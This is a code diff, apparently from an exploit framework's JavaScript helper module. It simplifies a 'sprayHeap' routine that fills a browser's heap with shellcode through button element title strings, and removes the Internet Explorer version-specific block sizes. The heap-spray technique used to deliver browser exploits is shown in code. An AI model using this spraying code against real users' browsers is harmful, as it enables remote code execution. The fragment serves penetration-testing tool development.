@@ -799,8 +799,6 @@ def js_base64
799799 #
800800 # The "sprayHeap" JavaScript function supports the following arguments:
801801 # shellcode => The shellcode to spray in JavaScript.
802- # browser => The type of browser to target for precise block size, such as:
803- # 'ie8', 'ie9', 'ie10', and 'generic'.
804802 # objId => Optional. The ID for a <div> HTML tag.
805803 # offset => Optional. Number of bytes to align the shellcode, default: 0x104
806804 # heapBlockSize => Optional. Allocation size, default: 0x80000
@@ -822,7 +820,6 @@ def js_property_spray
822820 function sprayHeap( oArg ) {
823821
824822 shellcode = oArg.shellcode;
825- browser = oArg.browser;
826823 offset = oArg.offset;
827824 heapBlockSize = oArg.heapBlockSize;
828825 maxAllocs = oArg.maxAllocs;
@@ -832,7 +829,6 @@ def js_property_spray
832829 if (offset == undefined) { offset = 0x104; }
833830 if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
834831 if (maxAllocs == undefined) { maxAllocs = 0x350; }
835- if (browser == undefined) { browser = 'generic'; }
836832
837833 if (offset > 0x800) { throw "Bad alignment"; }
838834
@@ -855,31 +851,8 @@ def js_property_spray
855851 for (var i = 0; i < maxAllocs; i++)
856852 {
857853 var obj = document.createElement("button");
858- switch (browser)
859- {
860- case 'ie8':
861- obj.title = data.substring(0, (heapBlockSize-6)/2);
862- div_container.appendChild(obj);
863- break;
864-
865- case 'ie9':
866- obj.title = data.substring(0, (heapBlockSize-2)/2);
867- div_container.appendChild(obj);
868- break;
869-
870- case 'ie10':
871- obj.title = data.substring(0, (heapBlockSize-2)/2);
872- div_container.appendChild(obj);
873- break;
874-
875- case 'generic':
876- obj.title = data.substring(0, (heapBlockSize-2)/2);
877- div_container.appendChild(obj);
878- break;
879-
880- default:
881- throw "Invalid argument";
882- }
854+ obj.title = data.substring(0, (heapBlockSize-2)/2);
855+ div_container.appendChild(obj);
883856 }
884857 }
885858 |
0 commit comments